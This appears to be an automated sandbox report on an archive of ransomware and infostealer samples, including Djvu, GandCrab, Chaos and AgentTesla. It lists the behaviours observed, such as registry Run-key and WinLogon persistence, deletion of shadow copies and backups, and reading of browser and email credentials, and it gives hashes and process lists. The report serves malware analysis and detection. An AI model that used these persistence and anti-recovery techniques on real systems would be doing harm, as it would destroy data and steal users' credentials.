Analysis Overview
SHA256
d5789e5e8acb837cf697c55826769bbe7ca8b537f74924452ef5451865a99887
Threat Level: Known bad
The file RNSM00468.7z was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
Djvu Ransomware
Avoslocker Ransomware
Chaos
AgentTesla
Detected Djvu ransomware
GandCrab payload
Gandcrab
Chaos Ransomware
Modifies boot configuration data using bcdedit
Renames multiple (71) files with added filename extension
Deletes shadow copies
Renames multiple (171) files with added filename extension
AgentTesla payload
Renames multiple (164) files with added filename extension
Blocklisted process makes network request
Deletes backup catalog
Reads user/profile data of web browsers
Loads dropped DLL
Reads data files stored by FTP clients
Obfuscated with Agile.Net obfuscator
Drops startup file
Unsecured Credentials: Credentials In Files
Reads WinSCP keys stored on the system
Reads user/profile data of local email clients
Checks computer location settings
Modifies file permissions
Executes dropped EXE
Adds Run key to start application
Uses Tor communications
Accesses Microsoft Outlook profiles
Drops desktop.ini file(s)
Looks up external IP address via web service
Enumerates connected drives
UPX packed file
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Detects Pyinstaller
Program crash
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Uses Volume Shadow Copy service COM API
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: AddClipboardFormatListener
outlook_win_path
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Opens file in notepad (likely ransom note)
Interacts with shadow copies
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-02 18:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-02 18:06
Reported
2024-10-02 18:12
Platform
win10v2004-20240802-en
Max time kernel
279s
Max time network
282s
Command Line
Signatures
AgentTesla
Avoslocker Ransomware
Chaos
Chaos Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
GandCrab payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gandcrab
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\MAINPROC.exe," | C:\Windows\SysWOW64\reg.exe | N/A |
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (164) files with added filename extension
Renames multiple (171) files with added filename extension
Renames multiple (71) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Encoder.gen-10b47927e604f0f0f8ac54c0ed2afcdfb6a25e47b4305a1f66d9e74e65d59f11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery.bmp | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery.bmp | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Crypmod.gen-44f0b6ee096aeb62aa585a0c37decaae0177eae22c18e40b0e823d9eaf856b78.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.txt | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\heur-trojan-ransom.msil.blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe | C:\Windows\system32\taskmgr.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\recovery.bmp | C:\Windows\system32\taskmgr.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini.cryptedpay | C:\Windows\system32\taskmgr.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\recovery.bmp.cryptedpay | C:\Windows\system32\taskmgr.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\svchost.url | C:\Windows\system32\taskmgr.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery.bmp | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\readme.txt | C:\Windows\system32\taskmgr.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f = "C:\\Users\\Admin\\AppData\\Roaming\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe" | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gj65mlrtzm = "C:\\Users\\Admin\\Desktop\\00468\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe" | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-f910502662909f3a1f4565a02d76f5e2b41e3c8f50c87cffba2dc554f18d6fb2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\2e5a1121-e777-444f-89f1-76f96316f33c\\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe\" --AutoStart" | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Convagent.gen-f231ced50f8e3e7c440594da12aef3856be1bb7620cdb553b55d49160e2f6a31.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Chrome = "\"C:\\Users\\Admin\\AppData\\Local\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe\"" | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-355097885-2402257403-2971294179-1000\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Uses Tor communications
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rh7r1mhxc.jpg" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-dd5069aae36220f626dfebd4656d40543b978c6f6ec6910004f5115f0121a4c3.exe |
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00468.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00468.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
